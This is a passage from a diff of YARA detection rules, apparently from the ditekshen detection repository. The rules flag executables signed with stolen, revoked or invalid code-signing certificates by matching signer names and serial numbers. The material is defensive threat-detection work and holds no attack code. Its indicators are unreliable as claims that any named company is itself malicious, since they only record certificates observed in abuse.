+		id = "59fcdc74-ca44-5d30-b9b0-5e9c7a3b50f3"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L81-L92"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6668-L6682"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aed6c65f9c6400c0cc94386be684d3b9dd8d7637f9798fb49f4f651cf28b2d12"
+		logic_hash = "f016093cd512bcbf31814ff1619441e476b3988d0670f469f6311eda37ae295d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a758d6799e218dd66261dc5e2e21791cbcccd6cb"
+		thumbprint = "3f53d410d2d959197f4a93d81a898f424941e11f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAKE CARE SP Z O O" and ( pe.signatures [ i ] . serial == "98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" or pe.signatures [ i ] . serial == "00:98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0095E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B8F726508Cf1D7B7913Bf4Bbd1E5C19C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "94878b56-5b29-55a8-a8ec-7ace588e34ef"
+		id = "0acaaed9-ba18-56b0-95b9-e05181843129"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L94-L105"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6684-L6698"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b1f8867b47c1bec43b3603af343d6d5728ec218a66863a6777c0ee59ae1faa98"
+		logic_hash = "71eb50a47465d69dbdd488c57b3fd9f70a4dd3b0bc086ed14038320928bc947e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6acdfee2a1ab425b7927d0ffe6afc38c794f1240"
+		thumbprint = "0711adcedb225b82dc32c1435ff32d0a1e54911a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TMerkuri LLC" and ( pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C167F04B338B1E8747B92C2197403C43 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Aa099E64E214D655801Ea38Ad876711 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d838e09b-e2f2-585a-a33d-bfe34f989e77"
+		id = "00b9cd1f-e389-51fd-8a08-73334bb0d0ef"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L107-L118"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6700-L6712"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "008fe748c7956c1885c7d7e3a843d2310c17b7552dbbe9b4750809a5642d7ca6"
+		logic_hash = "a4211bc2f3cedb8b135566d4b22251523a3a2bbdb04c1f1c5b1336ae7c198773"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7af7df92fa78df96d83b3c0fd9bee884740572f9"
+		thumbprint = "0789b35fd5c2ef8142e6aae3b58fff14e4f13136"
+		hash1 = "9f90e6711618a1eab9147f90bdedd606fd975b785915ae37e50e7d2538682579"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Psiphon Inc." and pe.signatures [ i ] . serial == "0a:a0:99:e6:4e:21:4d:65:58:01:ea:38:ad:87:67:11" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fc7065Abf8303Fb472B8Af85918F5C24 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_54Cc50D147Fa549E3F721C754E4E3A91 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d8c25f8a-e129-5cd4-9e60-d2e7ebbb1ea6"
+		id = "2007dabd-74c0-5cc7-986c-21fb1df9136a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L120-L131"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6714-L6726"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ce0d25ef802948f754f155010f42d76256895ebd6ffdce8d97063dada58e668"
+		logic_hash = "367237a9370542a4506fb13683f0a91e4bf5eb871e4b9f62b4cae8316bdf2d9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b61a6607154d27d64de35e7529cb853dcb47f51f"
+		thumbprint = "e3143f0df21fced02fe5525b297ed4cd389c66e3"
+		hash1 = "85adf569d259dc53c5099fea6e90ff3a614a406b4308ebdf9f40e8bed151f526"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralink Technology Corporation" and pe.signatures [ i ] . serial == "54:cc:50:d1:47:fa:54:9e:3f:72:1c:75:4e:4e:3a:91" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B61B8E71514059Adc604Da05C283E514 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1E508Bb2398808Bc420A5A1F67Ba5D0B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d52bd370-a1da-56f1-8edd-da61c9e2e75b"
+		id = "32f79595-6526-5dea-824a-cc073b6a2b5c"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L133-L144"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6728-L6740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b771d40e4e2db1d3f26d8fb2fa140f57871712700e584005d2377b701fc9538a"
+		logic_hash = "71b7efab5359408e3897498ce031c8375e2d67bfc8ff15c685df5ac6dd4bb015"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "67ee69f380ca62b28cecfbef406970ddd26cd9be"
+		thumbprint = "63a3ca4114aef8d5076ec84ff78d2319d5305e5b"
+		hash1 = "7ff82a6621e0dd7c29c2e6bcd63920f9b58bc254df9479618b912a1e788ff18b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WakeNet AB" and pe.signatures [ i ] . serial == "1e:50:8b:b2:39:88:08:bc:42:0a:5a:1f:67:ba:5d:0b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_51Cd5393514F7Ace2B407C3Dbfb09D8D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_008B3333D32B2C2A1D33B41Ba5Db9D4D2D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f2f7b08e-111c-570b-b376-79145050ca42"
+		id = "90947492-2f42-5d90-b635-62a5f7e79ffc"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L146-L157"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6742-L6757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "389dbdc85035fdd94e831940eda910349134600e921720729840c932123db36d"
+		logic_hash = "c15a248dd52e7e888da381fda296cf19c53196ef52c4c4ce74af646d427eccde"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "07a9fd6af84983dbf083c15983097ac9ce761864"
+		thumbprint = "7ecaa9a507a6672144a82d453413591067fc1d27"
+		hash1 = "5d5684ccef3ce3b6e92405f73794796e131d3cb1424d757828c3fb62f70f6227"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89" and ( pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_030012F134E64347669F3256C7D050C5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_B548765Eebe9468348Af40B9891C1E63 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7f16b535-8a0f-583d-8bc3-0abf24f26632"
+		id = "0ee1a31b-6324-5dbd-bd0d-765bc4891415"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L159-L170"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6759-L6771"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68bfd2e146e3b2bd1222de7f9981bb0e373bcb4727a81eb7060af36e6275d438"
+		logic_hash = "db8136f63657130bb3fe2527bb597e70bc3d46395aa3137810f4ee4b4de6c6ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "959caa354b28892608ab1bb9519424c30bebc155"
+		thumbprint = "5987703bc4a3c739f92af8fed1747394880e1a39"
+		hash1 = "501dee454ba470aa09ceceb4c93ab7e9e913729e47fcc184a2e2d675f8234a58"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OSIRIS Corporation" and pe.signatures [ i ] . serial == "b5:48:76:5e:eb:e9:46:83:48:af:40:b9:89:1c:1e:63" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B7F19B13De9Bee8A52Ff365Ced6F67Fa : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4697C7Ddd3E37Fe275Fdc6961A9093E3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b9cbe1bd-b24f-5599-a8b9-9e6f9b70f37f"
+		id = "9d611fee-cf29-523e-86f7-5c67f0e563a9"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L172-L183"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6773-L6785"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "afdc41aed0480593bb8c92955db044ebe1a695d4912176123e26e052a3e9d3ea"
+		logic_hash = "b3de1a753ac7a2f43ae64ee54fc81d92f70c32d4a04398a6dfc9a6ec856d8300"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "61708a3a2bae5343ff764de782d7f344151f2b74"
+		thumbprint = "ef24ae3635929c371d1427901082be9f76e58d9a"
+		hash1 = "fb3f622cf5557364a0a3abacc3e9acf399b3631bf3630acb8132514c486751e7"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xC3\\x89tienne Hill" and pe.signatures [ i ] . serial == "46:97:c7:dd:d3:e3:7f:e2:75:fd:c6:96:1a:90:93:e3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4C8Def294478B7D59Ee95C61Fae3D965 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_74C94Ef697Dc9783F845D26Dccc1E7Fd : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2f95a688-2fb2-55b7-9cd5-44586d6d4dc8"
+		id = "3cd08af1-8999-59a8-a679-a39871ecf68e"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L185-L196"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6787-L6799"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9e956d7d5b9389aebafd4b7025818ac8eb5a72aaa1b94068a12aa7a8029f97c"
+		logic_hash = "226dfe366c31e9cb38910df7d6cb2037c545745594fd133d7b7359175f153a90"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
+		thumbprint = "6daa64d7af228de45ded86ad4d1aeaa360295f56"
+		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CIBIKART d.o.o." and pe.signatures [ i ] . serial == "74:c9:4e:f6:97:dc:97:83:f8:45:d2:6d:cc:c1:e7:fd" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0A23B660E7322E54D7Bd0E5Acc890966 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Dd1Cb148A90123Dcc13498B54E5A798 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c9817cbd-edce-5ae0-ad70-58d592ac415f"
+		id = "8bdc91bc-5a59-5c22-8d39-fe1bf4267813"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L198-L209"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6801-L6812"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b9009d0c509b38107eba5742613f8ec6f48e447225c664e374ef56d64b035f0"
+		logic_hash = "9b5ec1b9d3fd15259d3628b5199b274f85674b404c57329d8af4f779ae357454"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c1e0c6dc2bc8ea07acb0f8bdb09e6a97ae91e57c"
+		thumbprint = "3a7c692345b67c7a2b21a6d94518588c8bbe514c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "33adab6a2ixdac07i4cLb4ac05j6yG2ew95e" and pe.signatures [ i ] . serial == "5d:d1:cb:14:8a:90:12:3d:cc:13:49:8b:54:e5:a7:98" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_04332C16724Ffeda5868D22Af56Aea43 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00A758504E7971869D0Aec2775Fffa03D5 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7e6be2f5-2f34-5337-8beb-4ccc6c50ad2d"
+		id = "1ecfe521-0148-5a13-b23f-dd1b14b835ed"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L211-L222"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6814-L6829"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "338e7d9374de04d00162c9caf86d922f4d659b024ae7908f0e02ca4709a14a1d"
+		logic_hash = "08f52e96d1e93e2d406753fd0dee5d03501ac037ab022b710362b113eaae6239"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cba350fe1847a206580657758ad6813a9977c40e"
+		thumbprint = "646bbb3a37cc004bea6efcd48579d1a5776cb157"
+		hash1 = "3194e2fb68c007cf2f6deaa1fb07b2cc68292ee87f37dff70ba142377e2ca1fa"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_085B70224253486624Fc36Fa658A1E32 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00F13A4F94Bf233525 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8d0f4499-1ed2-5277-be80-0b7f3499b360"
+		id = "1d048571-661e-5d7f-a255-f07b84069b20"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L224-L235"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6831-L6845"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8779cca652b366ce33a3735069fdc35657a6bed5b469a956cd236d76901f8f54"
+		logic_hash = "29284d9ced0d5e6d587edc9727321cdc7bf5ce4ad8407d460afa7f1e6d1bcb90"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "36834eaf0061cc4b89a13e019eccc6e598657922"
+		thumbprint = "974eb056bb7467d54aae25a908ce661dac59c786"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SocketOptionName" and ( pe.signatures [ i ] . serial == "f1:3a:4f:94:bf:23:35:25" or pe.signatures [ i ] . serial == "00:f1:3a:4f:94:bf:23:35:25" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0086E5A9B9E89E5075C475006D0Ca03832 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_119Acead668Bad57A48B4F42F294F8F0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "898bfe5f-5ac6-51f3-be55-09279a286835"
+		id = "d3f45ee1-134f-5b16-81f8-83405a5e3181"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L237-L248"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6847-L6858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "613f21989dc369ef6b1d8e42a0d707810ef064c608e4e34ba5eb475164f14abc"
+		logic_hash = "bae9aed4f53059b2ec0de630f681bb157c148d9ad38be35dd8c1a74b19619077"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "76f6c507e0bcf7c6b881f117936f5b864a3bd3f8"
+		thumbprint = "11ff68da43f0931e22002f1461136c662e623366"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_039668034826Df47E6207Ec9Daed57C3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_21144343720267Ba42F586105Ff279De : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8ae5f710-db8e-5d29-b247-a103f0878aa5"
+		id = "54e4133f-4fb7-5f70-a4dc-77c6f8120d29"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L250-L261"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6860-L6871"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9579ba5dac45e38ef7b2b3381d1651395a4f648c68ae8e6fc36a0ea2d9b6300"
+		logic_hash = "a1eacebed0966ad5d78eb7e38d8b854d183f21a19a53bbcb57503e4271b2cc84"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f98bdfa941ebfa2fe773524e0f9bbe9072873c2f"
+		thumbprint = "c56f79b4cc3a0e0894cd1e54facdf2db9d8ca62a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Varta Blue Dynamic" and pe.signatures [ i ] . serial == "21:14:43:43:72:02:67:ba:42:f5:86:10:5f:f2:79:de" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_736Dcfd309Ea4C3Bea23287473Ffe071 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00A3Cb8E964244768969B837Ca9981De68 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "058c4e85-e004-5fe0-9e16-9dbe333371f6"
+		id = "a9d74cc6-0d89-5de9-8f13-966455e49b9c"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
